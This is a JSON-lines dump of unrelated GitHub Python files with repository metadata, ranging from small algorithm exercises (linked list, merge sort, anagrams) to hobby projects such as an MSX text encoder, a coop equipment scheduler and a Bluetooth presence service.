print(\"In all, there are {0:d} turns.\".format(sumTurns))\n\n\nclass Game(object):\n \"\"\"An emo20q game instance\"\"\"\n\n def readTurns(self,fh):\n while True:\n turn = Turn()\n question = \"\"\n answer = \"\"\n qgloss = \"\"\n agloss = \"\"\n while True:\n line = fh.readline()\n #print(\"question: \"+line)\n if not line:\n break\n if re.match(\"end:\", line):\n fh.seek(fh.tell() - len(line.encode(\"utf-8\")),\n os.SEEK_SET)\n return\n if re.match(\"^ *$\", line):\n continue\n elif re.match(\"gloss:\", line):\n m = re.match(\"gloss:{(.*)}\", line)\n qgloss = m.group(1)\n break\n else:\n question += line\n\n while True:\n line = fh.readline()\n #print(\"answer: \"+line)\n if not line:\n break\n if re.match(\"end:\", line):\n fh.seek(fh.tell() - len(line.encode(\"utf-8\")),\n os.SEEK_SET)\n break\n if re.match(\"-\", line):\n continue\n elif re.match(\"gloss:\", line):\n m = re.match(\"gloss:{(.*)}\", line)\n agloss = m.group(1)\n break\n else:\n answer += line\n\n turn.q = question.strip()\n turn.qgloss = qgloss.strip()\n turn.a = answer.strip()\n turn.agloss = agloss.strip()\n #ignore non-yes-no questions and their answers\n if \"non-yes-no\" in turn.agloss: continue\n if \"non-yes-no\" in turn.qgloss: continue\n yield turn\n\nclass Turn(object):\n \"\"\"One of the question/answer pairs from and emo20q game\"\"\"\n\n def questionId(self):\n return self.qgloss\n def answerId(self):\n ans = \"other\"\n if \"agloss\" in self.__dict__:\n if self.agloss.find(\"yes\") == 0 : ans = \"yes\"\n if self.agloss.find(\"no\") == 0 : ans = \"no\"\n else:\n if self.a.lower().find(\"yes\") == 0 : ans = \"yes\"\n if self.a.lower().find(\"no\") == 0 : ans = \"no\"\n\n return ans\n\nclass Question(object):\n \"\"\"Keeps track of question strings\"\"\"\n\n def __init__(self,q,gloss):\n self.q = q\n self.gloss = gloss\n\nclass Answer(object):\n \"\"\"Keeps track of answer strings\"\"\"\n\n def __init__(self,a,gloss):\n self.a = a\n self.gloss = gloss\n\n\n\nif __name__ == \"__main__\":\n\n import argparse\n parser = argparse.ArgumentParser(description=\"\"\"study information contained in the gloss file \"\"\")\n parser.add_argument('-e', '--emotions',\n action='store_true',\n help='print list of emotions, from end: annotation')\n parser.add_argument('-w', '--webpage',\n default=False,\n help='generate a webpage rendering of the data')\n # can add new arguments to argparser to implement new features\n # e.g parser.add_argument('-p', '--players', ...\n\n args = parser.parse_args()\n if args.emotions: # if -e or --emotion flag is used\n # read in tournament\n t = HumanHumanTournament()\n assert isinstance(t, Tournament) # t is Tournament class\n assert type(t.games ) == list # games() returns a list\n for g in t.games:\n print(g.emotion)\n if args.webpage: # if --html flag is used\n if not os.path.isdir(args.webpage):\n sys.exit(args.webpage + \" must be a directory\")\n from jinja2 import Template, Environment, BaseLoader\n import jieba\n basetemplate = Environment(loader=BaseLoader).from_string(\"\"\"\n \n \n {% block title %}{% endblock %}\n \n \n {% block body %}{% endblock %}\n \n \n \"\"\")\n index = Template(\"\"\"\n \n \n EMO20Q-CN Index \n \n \n

EMO20Q-CN Index

\n \n \n \n \"\"\")\n\n dialog = Template(\"\"\"\n \n \n EMO20Q-CN Game/Dialog \n \n \n

EMO20Q-CN Game/Dialog

\n
    \n {% for turn in turns %}\n
  • Turn {{ loop.index }}\n \n
  • \n {% endfor %}\n
\n \n \n \"\"\")\n\n # read in tournament\n t = HumanHumanTournament()\n assert isinstance(t, Tournament) # t is Tournament class\n assert type(t.games ) == list # games() returns a list\n games = [g for g in t.games]\n with open(os.path.join(args.webpage, \"index.html\"), \"w\") as f:\n print(index.render(games=games), file=f)\n\n for i, game in enumerate(games):\n with open(os.path.join(args.webpage, str(i)+\".html\"), \"w\") as f:\n print(dialog.render(turns=game.turns, cut=jieba.cut), file=f)\n\n else:\n parser.print_help()\n","repo_name":"abecode/emo20q-cn","sub_path":"emo20q/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29452007779","text":"class Ciudad:\n def __init__(self, x, y):\n self.xo = x\n self.yo = y\n self.x = x\n self.y = y\n\n def camino(self, other):\n camino = []\n terminado = False\n while not terminado:\n if self.x == other.x and self.y == other.y:\n terminado = True\n\n paso = []\n if self.x < other.x:\n paso.append(self.x)\n self.x += 1\n\n elif other.x < self.x:\n paso.append(other.x)\n other.x += 1\n\n else:\n paso.append(self.x)\n\n if self.y < other.y:\n paso.append(self.y)\n self.y += 1\n\n elif other.y < self.y:\n paso.append(other.y)\n other.y += 1\n\n else:\n paso.append(self.y)\n\n camino.append(paso)\n\n return camino\n\n def distancia(self, other):\n distancia = ((self.xo-other.xo)**2 + (self.yo-other.yo)**2)**(1/2)\n return distancia\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema3_ej5/tema3_ej5_82e1a4d9a93c1ed4d6296e2bc4888387.py","file_name":"tema3_ej5_82e1a4d9a93c1ed4d6296e2bc4888387.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11629644005","text":"import os\n\nfrom vocabulary import Vocabulary\n\nmsx_map = {\n \"ю\": 192,\n \"а\": 193,\n \"б\": 194,\n \"ц\": 195,\n \"д\": 196,\n \"е\": 197,\n \"ф\": 198,\n \"г\": 199,\n\n \"х\": 200,\n \"и\": 201,\n \"й\": 202,\n \"к\": 203,\n \"л\": 204,\n \"м\": 205,\n \"н\": 206,\n \"о\": 207,\n\n \"п\": 208,\n \"я\": 209,\n \"р\": 210,\n \"с\": 211,\n \"т\": 212,\n \"у\": 213,\n \"ж\": 214,\n \"в\": 215,\n\n \"ь\": 216,\n \"ы\": 217,\n \"з\": 218,\n \"ш\": 219,\n \"э\": 220,\n \"щ\": 221,\n \"ч\": 222,\n \"ъ\": 223,\n\n \"Ю\": 224,\n \"А\": 225,\n \"Б\": 226,\n \"Ц\": 227,\n \"Д\": 228,\n \"Е\": 229,\n \"Ф\": 230,\n \"Г\": 231,\n\n \"Х\": 232,\n \"И\": 233,\n \"Й\": 234,\n \"К\": 235,\n \"Л\": 236,\n \"М\": 237,\n \"Н\": 238,\n \"О\": 239,\n\n \"П\": 240,\n \"Я\": 241,\n \"Р\": 242,\n \"С\": 243,\n \"Т\": 244,\n \"У\": 245,\n \"Ж\": 246,\n \"В\": 247,\n\n \"Ь\": 248,\n \"Ы\": 249,\n \"З\": 250,\n \"Ш\": 251,\n \"Э\": 252,\n \"Щ\": 253,\n \"Ч\": 254\n }\n\ndef encode(src):\n dst = b\"\"\n for i in range(len(src)):\n if src[i] in \"()!? -_[]?!()\":\n dst += src[i].encode(\"latin-1\")\n elif src[i] in msx_map.keys():\n # u = bytes.fromhex(hex(msx_map[src[i]])[2:])\n u = chr(msx_map[src[i]]).encode(\"latin-1\")\n dst += u\n if len(src) != len(dst):\n print(f\"WARNING: {src} != {dst}\")\n return dst\n\n\ndef main():\n update=True\n language_list = [\"EN\", \"RU\"]\n vocabulary = Vocabulary(\"../data\", update=update)\n vocabulary.set_language_list(language_list)\n vocabulary.get_source_sets()\n line_nr=4000\n lines = []\n while True:\n row = vocabulary.sample(repeat=False)\n if row is None:\n break\n try:\n en_enc = row[\"EN\"].encode(\"ascii\") \n except:\n continue\n line = str(line_nr).encode(\"latin-1\") + b\" data \" + b\"\\\"\" + en_enc + b\"\\\"\" + b\"\\r\\n\"\n lines.append(line)\n ru_enc = encode(row[\"RU\"])\n line = str(line_nr + 1).encode(\"latin-1\") + b\" data \" + b\"\\\"\" + ru_enc + b\"\\\"\" + b\"\\r\\n\"\n lines.append(line)\n line_nr += 2\n with open(os.path.join(os.path.expanduser(\"~/Development/git/msx/src/basic/ru.bas\")), \"wb\") as fp:\n fp.writelines(lines)\n\n\n\n \n \n\n \n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gilbertfrancois/rosetta","sub_path":"src/convert2msx.py","file_name":"convert2msx.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33456382008","text":"import unittest\nfrom unittest.mock import patch\nfrom Tiles import Board\n\n\nclass TestReadInBoard(unittest.TestCase):\n\n @patch('Tiles.get_yes_or_no_input', return_value=True)\n def test_Standard_Board(self, input):\n Board.read_in_board()\n print(Board.spaces)\n self.assertEqual(41, len(Board.spaces)) # 41 due to jail/just visiting\n Board.default_board()\n\n\nclass TestDefaultBoard(unittest.TestCase):\n\n def test_default_board(self):\n self.assertEqual(len(Board.spaces), 40)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"KGB33/Monopoly","sub_path":"Monopoly/test_Board.py","file_name":"test_Board.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16655909073","text":"# 杨辉三角对称法\r\nn = eval(input())\r\ntriangle = [[1], [1, 1]]\r\nfor i in range(2, n):\r\n tmp = triangle[-1] # 上一个列表\r\n cul = [1]*(i+1)\r\n for j in range(i//2):\r\n cul[j+1] = tmp[j]+tmp[j+1] # 临界值大约是中点处,但有例外\r\n if i != 2j: # 当j不为中点时\r\n cul[-j-2] = cul[j+1]\r\n triangle.append(cul)\r\nfor i in range(n): # 按照等边三角形格式输出\r\n s = \" \"*(n-1-i)\r\n for j in triangle[i]:\r\n s = s+str(j)+\" \" # 控制每行每个元素的间隔\r\n print(s)\r\n","repo_name":"shixiaoshena/ppp","sub_path":"杨辉三角3.py","file_name":"杨辉三角3.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18614767117","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n self.length = 0\n \n def append(self, data):\n new_node = Node(data)\n \n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n \n self.length += 1\n \n return self\n \n def prepend(self, data):\n new_node = Node(data)\n \n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n new_node.next = self.head\n self.head = new_node\n \n self.length += 1\n \n return self\n \n def __traverse_to_index(self, index):\n it = self.head\n i = 0\n \n while i < index:\n it = it.next\n i += 1\n \n return it\n \n def insert(self, index, data):\n if index >= self.length:\n return self.append(data) \n \n new_node = Node(data)\n leader = self.__traverse_to_index(index - 1)\n new_node.next = leader.next\n leader.next = new_node \n self.length += 1\n \n return self\n \n def remove(self, index):\n if index >= self.length:\n leader = self.__traverse_to_index(self.length - 2)\n leader.next = None\n self.length -= 1\n return self\n \n leader = self.__traverse_to_index(index - 1)\n leader.next = leader.next.next\n self.length -= 1\n \n return self\n \n def reverse(self):\n if not self.head.next:\n return self\n \n first = self.head\n self.tail = self.head\n second = first.next\n \n while second:\n temp = second.next\n second.next = first\n first = second\n second = temp\n \n self.head.next = None\n self.head = first\n \n return self\n \n def print(self):\n a_list = [] \n it = self.head\n \n while it:\n a_list.append(it.data)\n it = it.next\n \n print(f\"LinkedList(len:{self.length}):{a_list}\")\n \n\nll = LinkedList()\nll.append(10)\nll.append(5)\nll.append(16)\nll.print()\nll.prepend(1)\nll.print()\nll.insert(2, 99)\nll.insert(20, 88)\nll.print()\nll.reverse()\nll.print()\nll.reverse()\nll.remove(2)\nll.print()\nll.remove(2)\nll.print()\nll.remove(100)\nll.print()\nll.reverse()\nll.print()\n\n\n\n","repo_name":"emre-ergun/data-structure-alogrithms","sub_path":"python_review/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29471386539","text":"hombre_imaginario = \"\"\"\nEl hombre imaginario\nvive en una mansión imaginaria\nrodeada de árboles imaginarios\na la orilla de un río imaginario\n\nDe los muros que son imaginarios\npenden antiguos cuadros imaginarios\nirreparables grietas imaginarias\nque representan hechos imaginarios\nocurridos en mundos imaginarios\nen lugares y tiempos imaginarios\n\nTodas las tardes tardes imaginarias\nsube las escaleras imaginarias\ny se asoma al balcón imaginario\na mirar el paisaje imaginario\nque consiste en un valle imaginario\ncircundado de cerros imaginarios...\"\"\"\n\ndef estadisticas_frase(frase):\n palabras=frase.split()\n x=0\n espacio=0\n puntuacion=0\n totalLargo=0\n correccion=0\n Tcarac=len(frase)\n while x/_.html\n context_object_name = 'books'\n ordering = ['-created_date']\n filterset_fields = ['title', 'author', 'language', 'published_date']\n\n\nclass BooksDetailView(DetailView):\n model = PostBook\n\n\nclass BooksCreateView(CreateView):\n model = PostBook\n form_class = BooksCreateForm\n\n\nclass BooksUpdateView(UpdateView):\n model = PostBook\n form_class = BooksCreateForm\n\n\nclass BooksDeleteView(DeleteView):\n model = PostBook\n form_class = BooksCreateForm\n success_url = '/'\n\n# Filter view\n\n\ndef search(request):\n books_list = PostBook.objects.all()\n books_filter = PostBookFilter(request.GET, queryset=books_list)\n return render(request, 'BooksApp/search.html', {'filter': books_filter})\n","repo_name":"konfle/Books","sub_path":"BooksApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35347497852","text":"# -*- coding: UTF-8 -*-\n#\n# Given an array of strings, group anagrams together.\n#\n# For example, given: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"],\n# Return:\n#\n# [\n# [\"ate\", \"eat\",\"tea\"],\n# [\"nat\",\"tan\"],\n# [\"bat\"]\n# ]\n# Note: All inputs will be in lower-case.\n#\n# Python, Python 3 all accepted.\n\n\nclass GroupAnagrams:\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n m_map = {}\n for s in strs:\n chars = tuple(sorted(s))\n if m_map.get(chars) is None:\n m_map[chars] = list()\n m_map[chars].append(s)\n\n return list(m_map.values())\n","repo_name":"TonnyL/Windary","sub_path":"Python/GroupAnagrams.py","file_name":"GroupAnagrams.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":187,"dataset":"github-code","pt":"77"} +{"seq_id":"28417678522","text":"\"\"\"travelAndTourism URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom main.views import *\nfrom location.views import *\nfrom about.views import *\nfrom contactus.views import *\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',homepage),\n # path('login/',login),\n path('signin/signin/loggedin/',login),\n path('signin/loggedin/',login),\n path('signup/addNewUser/signin/',login),\n path('signin/',sign_in),\n path('signup/',sign_up),\n # path('signup/add_new_user/',sign_up),\n path('location/',location),\n # path('basic',basic),\n path('about/',about),\n path('contact_us/',contactus),\n path('location/kangra/',kangra),\n path('location/una/',una),\n path('location/kullu/',kullu),\n path('location/chamba/',chamba),\n path('location/solan/',solan),\n path('location/sirmaur/',sirmaur),\n path('location/hamirpur/',hamirpur),\n path('location/kinnaur/',kinnaur),\n path('location/bilaspur/',bilaspur),\n path('location/lahul_spiti/',lahul_spiti),\n path('location/shimla/',shimla),\n path('location/mandi/',mandi),\n # path('addNewUser/',add_user),\n path('signup/addNewUser/',add_user) #if this line missing , we get an error\n\n\n]\n","repo_name":"manishd01/travelAndTourismGuide","sub_path":"travelAndTourism/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70998204728","text":"# Based on Arduino code from https://medium.com/electronza/arduino-4-20ma-current-loop-revisited-a-simpler-calibration-procedure-5b6f6be4dc80\n\nimport spidev\nimport lgpio\nimport time\n\nspi_t = spidev.SpiDev()\nspi_t.open(0, 0)\n#spi_t.max_speed_hz = 1000000 #1MHz\nspi_t.max_speed_hz = 4800 #1MHz\nspi_t.mode = 0b00\nspi_t.lsbfirst = False\nspi_t.no_cs = True\n\n''' Resetting MCP3201\n * From MCP3201 datasheet: If the device was powered up with the CS pin low, \n * it must be brought high and back low to initiate communication.\n * The device will begin to sample the analog input on the first rising edge \n * after CS goes low. \n'''\n# pinMode (ADC_CS, OUTPUT);\n# digitalWrite(ADC_CS, 0);\n# delay(100);\n# digitalWrite(ADC_CS, 1);\n\nCE_T = 20\n\nc = lgpio.gpiochip_open(0)\nlgpio.gpio_claim_output(c, CE_T, 1)\ntime.sleep(0.1)\n\n'''\nspi_r = spidev.SpiDev()\nspi_r.open(0, 1)\nspi_r.max_speed_hz = 1000000 #1MHz\nspi_r.mode = 0b01\nspi_r.lsbfirst = False\n'''\n\n#spi_r.cshigh = False\n#time.sleep(0.1)\n#spi_r.cshigh = True\n#time.sleep(0.1)\n\nL = 801\nH = 4030\n\ndef set_DAC(v):\n msb = (v >> 8) & 0x0F\n msb = msb | 0x30\n lsb = v & 0xFF\n\n lgpio.gpio_write(c, CE_T, 0)\n time.sleep(0.1)\n r = spi_t.xfer([msb, lsb])\n time.sleep(0.1)\n lgpio.gpio_write(c, CE_T, 1)\n print(\"set_DAC(\",v,\") returns:\", r)\n\ndef get_ADC():\n #msb = spi_r.xfer([0])\n #lsb = spi_r.xfer([0])\n msb = spi_r.readbytes(1)\n lsb = spi_r.readbytes(1)\n\n #result = ((msb & 0x1F) << 8) | lsb\n #return result >> 1\n return msb, lsb\n\n\ndef map420(v, flow, fhigh, tlow, thigh):\n if v < flow:\n return False, v\n if v > fhigh:\n return False, v\n \n return True, int((v - flow)*(thigh-tlow) / (fhigh-flow)+tlow)\n\n# https://www.theamplituhedron.com/articles/How-to-replicate-the-Arduino-map-function-in-Python-for-Raspberry-Pi/\n# Prominent Arduino map function :)\ndef _map(x, in_min, in_max, out_min, out_max):\n return int((x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min)\n\t\n# TEST\ny = _map(25, 1, 50, 50, 1)\n#print(y)\n\nwhile True:\n n=int(input(\"Enter(0~4095):\"))\n set_DAC(n)\n time.sleep(0.25)\n #m,l=get_ADC()\n #print(\"msb:\",m, \" lsb:\",l)\n #time.sleep(0.25)\n","repo_name":"iryek-rpi/rpi-pump","sub_path":"Test/SPI/tclick.py","file_name":"tclick.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28449866990","text":"from typing import Union\n\nimport bluetooth\n\nfrom services.console_service import print_bluetooth\nfrom services.database_service import DatabaseService\n\n\nclass BluetoothService:\n \"\"\"This list contains all devices that are related to an account and nearby!\"\"\"\n devices_in_range: list[dict[str, str]] = []\n\n \"\"\"This list contains all devices that are not related to an account and nearby!\"\"\"\n devices_in_range_registrable: list[dict[str, str]] = []\n\n def __init__(self, service: DatabaseService) -> None:\n self.db_service: DatabaseService = service\n\n # https://github.com/pybluez/pybluez\n def scan(self, duration: int) -> None:\n print_bluetooth('Scanning for bluetooth devices...')\n # All devices that are nearby\n devices = bluetooth.discover_devices(duration=duration, lookup_names=True)\n\n # Remove device from \"devices_in_range\" if it was added before but now too far away\n for current in self.devices_in_range:\n if not any(device[0] == current.get('bd_addr') for device in devices):\n self._remove_device(current.get('name'), current.get('bd_addr'))\n\n # Remove device from \"devices_in_range_registrable\" if it was added before but now too far away\n for current in self.devices_in_range_registrable:\n if not any(device[0] == current.get('bd_addr') for device in devices):\n self.devices_in_range_registrable.remove(BluetoothService._convert_to_dict(current.get('name'),\n current.get('bd_addr')))\n # If no devices are nearby; nothing to add\n if len(devices) == 0:\n print_bluetooth('No new device found!')\n return\n\n # Check whether new devices are nearby\n for addr, name in devices:\n if BluetoothService._convert_to_dict(name, addr) not in self.devices_in_range:\n self._add_device(name, addr)\n\n def register(self, device_name: str, bd_addr: str) -> None:\n self.devices_in_range_registrable.remove(self._convert_to_dict(device_name, bd_addr))\n self.devices_in_range.append(self._convert_to_dict(device_name, bd_addr))\n\n def update(self, old_device_entry: dict[str, str], new_device_name: str, new_bd_addr: str) -> None:\n self.register(new_device_name, new_bd_addr)\n self.delete(old_device_entry)\n\n def delete(self, device_entry: dict[str, str]) -> None:\n self.devices_in_range.remove(device_entry)\n self.devices_in_range_registrable.append(device_entry)\n\n def get_bluetooth_device_entry(self, user_id: int) -> Union[dict[str, str], bool]:\n user = self.db_service.get_user(user_id)\n user_bd_name = None\n\n for device in self.devices_in_range.copy():\n if device.get('bd_addr') == user.get('bd_addr'):\n user_bd_name = device.get('name')\n\n if user_bd_name is None:\n return False\n\n return self._convert_to_dict(user_bd_name, user.get('bd_addr'))\n\n def _add_device(self, name: str, bd_address: str) -> None:\n entry: dict = BluetoothService._convert_to_dict(name, bd_address)\n print_bluetooth('Found new device \\\"%s\\\"!' % name)\n\n if not self.db_service.bd_addr_exists(bd_address):\n if entry not in self.devices_in_range_registrable:\n self.devices_in_range_registrable.append(entry)\n print_bluetooth('\\tDevice not registered!')\n return\n\n self.devices_in_range.append(entry)\n print_bluetooth('\\tAdded new device: ')\n print_bluetooth('\\tName: %s' % name)\n print_bluetooth('\\tBD address: %s' % bd_address)\n\n def _remove_device(self, name: str, bd_address: str) -> None:\n print_bluetooth('Found old device!')\n self.devices_in_range.remove(BluetoothService._convert_to_dict(name, bd_address))\n print_bluetooth('\\tRemoved device: ')\n print_bluetooth('\\tName: %s' % name)\n print_bluetooth('\\tBD address: %s' % bd_address)\n\n @staticmethod\n def _convert_to_dict(name: str, bd_address: str) -> dict[str, str]:\n return dict({'name': name, 'bd_addr': bd_address})\n","repo_name":"TorbenWest/PIOT","sub_path":"src/services/bluetooth_service.py","file_name":"bluetooth_service.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39030758724","text":"import random\nimport timeit\n\n\ndef merge_sort1(input_list):\n return_list = []\n if len(input_list) >= 2:\n mid_list = len(input_list) // 2\n list1 = merge_sort1(input_list[:mid_list])\n list2 = merge_sort1(input_list[mid_list:])\n while list1 or list2:\n if not list1:\n return_list.append(list2.pop(0))\n elif not list2:\n return_list.append(list1.pop(0))\n elif list1[0] < list2[0]:\n return_list.append(list1.pop(0))\n else:\n return_list.append(list2.pop(0))\n else:\n return_list = input_list\n return return_list\n\n\ndef merge_sort2(input_list):\n return_list = []\n if len(input_list) >= 2:\n mid_list = len(input_list) // 2\n list1 = merge_sort2(input_list[:mid_list])\n list2 = merge_sort2(input_list[mid_list:])\n while list1 and list2:\n if list1[0] < list2[0]:\n return_list.append(list1.pop(0))\n else:\n return_list.append(list2.pop(0))\n return_list.extend(list1)\n return_list.extend(list2)\n else:\n return_list = input_list\n return return_list\n\n\nint_list = [random.randint(0, 100000) for _ in range(100000)]\n\n# print(timeit.timeit(lambda: bubble_sort(input_list), number=10))\nprint(timeit.timeit(lambda: merge_sort1(int_list), number=100))\nprint(timeit.timeit(lambda: merge_sort2(int_list), number=100))\n","repo_name":"erkiraak/SDA-class-work","sub_path":"4_Python_algorithms_and_data_structures/sort_merge.py","file_name":"sort_merge.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73558585530","text":"# Main cron for running equipment on a schedule. Checks each piece of equipment in the coop\n# and decides if its time to turn it on or off.\n#\n# Check available options:\n# python scheduler.py -h\n#\n# Crontab: every 10 minutes during the daytime\n# 0/10 5-20 * * * python /full/path/scheduler.py -s /some/path/data/settings.json\n#\n#\n\nimport logging\nimport argparse\nfrom datetime import datetime\nfrom dateutil import tz\nfrom coopcontrol import door,light\n\nsysparse = argparse.ArgumentParser(description=\"Check each piece of equipment in the coop \"\n \"and decide if it should be on or off.\")\nsysparse.add_argument('-s', '--settings', required=True,\n help=(\"The location of the settings.json file containing information like \"\n \"the BCM pins for your coop. Ex: \"\n \"/tmp/files/settings.json\"))\nsysargs = sysparse.parse_args()\n\n\ndef check_item(item):\n current_time = datetime.now(tz.tzlocal())\n\n start = item.get_start_time()\n end = item.get_end_time()\n\n if start <= current_time < end:\n logging.debug('within the start and end time, %s should be %s',\n item.__class__.__name__,\n item.get_status_name(1))\n item.set_status(1)\n else:\n logging.debug('outside the start and end time, %s should be %s',\n item.__class__.__name__,\n item.get_status_name(0))\n item.set_status(0)\n\n\ndef main():\n check_item(light.Light(sysargs.settings))\n check_item(door.Door(sysargs.settings))\n\n\nif __name__ == '__main__':\n main()","repo_name":"isometimescode/coopcontrol","sub_path":"bin/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"27316825606","text":"class work:\n\n @staticmethod\n def startend(array1):\n a = []\n start = array1[0]\n end = array1[len(array1)-1]\n\n a.append(start)\n a.append(end)\n\n print(a)\n\naayush = work()\nb = [-1,-34,5, 10, 15, 20, 25,30,27,34]\n\naayush.startend(b)\n","repo_name":"a332shar/Python-Projects","sub_path":"start and end of a list.py","file_name":"start and end of a list.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13025780900","text":"import copy\nimport dataclasses\nfrom typing import Generator, Optional\n\n\n@dataclasses.dataclass\nclass RMQSSLOptions:\n \"\"\"\n cafile: str\n keyfile: str\n certfile: str\n verify: int\n\n verify param: 1 or 0 - to verify certificate or not\n \"\"\"\n\n cafile: str\n keyfile: str\n certfile: str\n verify: int\n\n\n@dataclasses.dataclass\nclass RabbitMQConfig:\n \"\"\"\n login: str\n password: str\n virtualhost: str\n host: Optional[str] = None\n port: Optional[int] = None\n addresses: Optional[str] = None\n ssl_options: Optional[RMQSSLOptions] = None\n\n Note: address, host & port are 'Optional', but at least one of: address, or host + port\n must be set to connect with Rabbit MQ !\n \"\"\"\n\n login: str\n password: str\n virtualhost: str\n host: Optional[str] = None\n port: Optional[int] = None\n addresses: Optional[str] = None\n ssl_options: Optional[RMQSSLOptions] = None\n\n def __post_init__(self):\n if self.port:\n try:\n self.port = int(self.port)\n except ValueError:\n raise ValueError(\"Port must be a number!\")\n\n def generate(self) -> Generator[\"RabbitMQConfig\", None, None]:\n if self.host and self.port:\n yield self\n\n if self.addresses:\n for address in self.addresses.split(\",\"):\n rmq_config = copy.copy(self)\n rmq_config.host, rmq_config.port = address.split(\":\")\n rmq_config.port = int(rmq_config.port)\n yield rmq_config\n\n def all_required(self) -> bool:\n \"\"\"This method verifies existence all fields required to connect to RabbitMQ.\n 'addresses' is not checked, since it should be parsed i.e. using .generate() method\n \"\"\"\n\n return all(\n (\n elem is not None\n for elem in (self.login, self.password, self.virtualhost, self.host, self.port)\n )\n )\n","repo_name":"ngraczykowski/iris-root","sub_path":"modules/s8-python-network/s8_python_network/pika_connection/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43690320301","text":"from zope.interface import implements\nfrom zope.component import getAdapters, queryMultiAdapter\nfrom Products.CMFCore.utils import getToolByName\nfrom plone.app.portlets.portlets import base\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom zope.viewlet.interfaces import IViewletManager, IViewlet\nfrom zope.contentprovider.tales import addTALNamespaceData\nfrom simplelayout.portlet.dropzone.interfaces import (\n ISimpleLayoutListingPortletViewlet, ISlotBlock)\n\n\nclass ISimplelayoutDropZonePortlet(IPortletDataProvider):\n \"\"\"\n marker Interface for portlet\n \"\"\"\n\n\nclass Assignment(base.Assignment):\n \"\"\"Portlet assignment.\n \"\"\"\n implements(ISimplelayoutDropZonePortlet)\n @property\n def title(self):\n return \"Simplelayout DropZone Portlet\"\n\n\nclass Renderer(base.Renderer):\n \"\"\"Portlet renderer\n \"\"\"\n\n render = ViewPageTemplateFile('drop_zone_portlet.pt')\n\n\n def update(self):\n context = self.context\n\n\n def blockRenderer(self,name=\"simplelayout.portlet.listing\"):\n\n manager = queryMultiAdapter((self.context, self.request, self),\n IViewletManager, name)\n viewlet_adapters = getAdapters(\n (manager.context, manager.request, manager.__parent__, manager),\n IViewlet)\n\n if manager is None:\n return ''\n addTALNamespaceData(manager, self.context)\n manager.update()\n return manager.render()\n\n def getBlockPortlets(self):\n return self.context.getFolderContents(\n {'object_provides':[ISlotBlock.__identifier__]})\n\n @property\n def available(self):\n mtool = getToolByName(self.context,'portal_membership')\n if self.getBlockPortlets():\n return True\n if mtool.checkPermission('Modify portal content', self.context):\n return True\n return False\n\n\nclass AddForm(base.NullAddForm):\n def create(self):\n return Assignment()\n","repo_name":"4teamwork/simplelayout.portlet.dropzone","sub_path":"simplelayout/portlet/dropzone/portlets/drop_zone_portlet.py","file_name":"drop_zone_portlet.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74220451127","text":"import urllib\nimport urlparse\nfrom collections import defaultdict\n\nfrom django.core.cache import cache\nfrom 